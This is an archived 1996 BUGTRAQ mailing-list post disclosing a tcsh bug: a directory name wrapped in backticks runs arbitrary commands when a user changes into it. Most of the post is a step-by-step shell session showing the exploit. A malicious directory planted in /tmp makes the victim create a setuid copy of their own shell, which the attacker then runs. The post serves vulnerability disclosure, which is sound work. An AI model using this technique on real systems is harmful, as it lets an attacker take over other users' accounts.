From proff Sat Sep 14 10:35:41 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA14585 for best-of-security; Sat, 14 Sep 1996 10:35:41 +1000 Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with SMTP id HAA01220; Sat, 14 Sep 1996 07:55:32 +1000 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <25471-24839>; Fri, 13 Sep 1996 16:04:25 -0500 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id QAA07987; Fri, 13 Sep 1996 16:06:34 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 398702 for BUGTRAQ@NETSPACE.ORG; Fri, 13 Sep 1996 15:44:57 -0400 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id NAA22156 for ; Fri, 13 Sep 1996 13:26:09 -0400 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from maxx.mc.net (maxx.mc.net [206.138.8.7]) by netspace.org (8.7/8.6.12) with ESMTP id KAA31941 for ; Fri, 13 Sep 1996 10:03:01 -0400 Received: from maxx.mc.net (root@maxx.mc.net [206.138.8.7]) by maxx.mc.net (8.7.4/8.6.12) with SMTP id JAA20381 for ; Fri, 13 Sep 1996 09:03:00 -0500 (CDT) X-Sender: root@maxx.mc.net MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: test Message-ID: Date: Fri, 13 Sep 1996 09:03:00 -0500 Reply-To: test Sender: proff From: test Subject: tee see shell problems To: Multiple recipients of list BUGTRAQ A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed out with BSDI anyway.) that allows the execution of arbitrary commands when changing into directories that are enclosed with back tic's. The problem might also prove to be quite bad to tcsh scripts that find themselves changing into directories on the fly. Here is probably one of the dumbest methods possible that could be used to exploit this weakness. ----------------------------Cut to Bad guy-------------------------------- jim% whoami Evol bad guy jim% mkdir /tmp/\`source\ .WaReZ\` jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ jim% chmod +x /tmp/*W*/.WaReZ ---------------------------Cut to unsuspecting foo------------------------ jim% whoami Unsuspecting foo jim% echo $SHELL /bin/tcsh jim% I just like to check that sometimes. jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff jim% cd /tmp jim% ls `source .WaReZ` jim% OH BOY!!! the jack pot! jim% cd *WaReZ* jim% ls jim% oh, oh well maybe I'll check later... jim% cd $HOME ----------------------------Cut to More Bad guy-------------------------- jim% ls -a /tmp/*W*/ . .. .24753 jim% /tmp/*W*/.24753 $whoami unsuspecting foo $ hah. ---------------------------End Unix Parable-------------------------------